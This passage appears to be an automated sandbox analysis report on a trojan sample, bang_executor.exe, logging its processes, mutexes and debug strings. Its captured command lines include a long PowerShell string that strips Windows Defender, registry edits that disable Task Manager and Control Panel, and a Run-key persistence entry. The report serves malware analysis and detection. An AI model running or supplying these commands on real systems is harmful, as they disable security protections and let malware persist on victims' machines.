          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: gpapi.dll
          Source: bang_executor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: executer.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: executer.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: bang_executor.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: bang_executor.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@45/30@1/1
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E7BFF GetLastError,FormatMessageW,0_2_004E7BFF
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FC652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_004FC652
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\executer.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7572
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7644:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7356
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1236
          Source: C:\Users\user\Desktop\bang_executor.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: sfxname0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: sfxstime0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: pPR0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: STARTDLG0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: >GQ0_2_00514690
          Source: bang_executor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\bang_executor.exeFile read: C:\Windows\win.ini
          Source: C:\Users\user\Desktop\bang_executor.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\bang_executor.exeFile read: C:\Users\user\Desktop\bang_executor.exe
          Source: unknownProcess created: C:\Users\user\Desktop\bang_executor.exe C:\Users\user\Desktop\bang_executor.exe
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.bat
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.bat
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name 
SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Source: C:\Users\user\Desktop\bang_executor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: bang_executor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbC source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB4% source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbx source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb" source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB@ source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Web.Extensions.pdbMZ source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbE source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*' source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb&$ source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: bang_executor.PDB` source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDBpF source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb??\p= source: WERF485.tmp.dmp.34.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb\ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbL source: bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb, source: bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: bang_executor.exe
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb/ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb& source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb| source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb_ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bang_executor.PDB@ source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: b77a5c561934e089\mscorlib.pdb>w0 source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
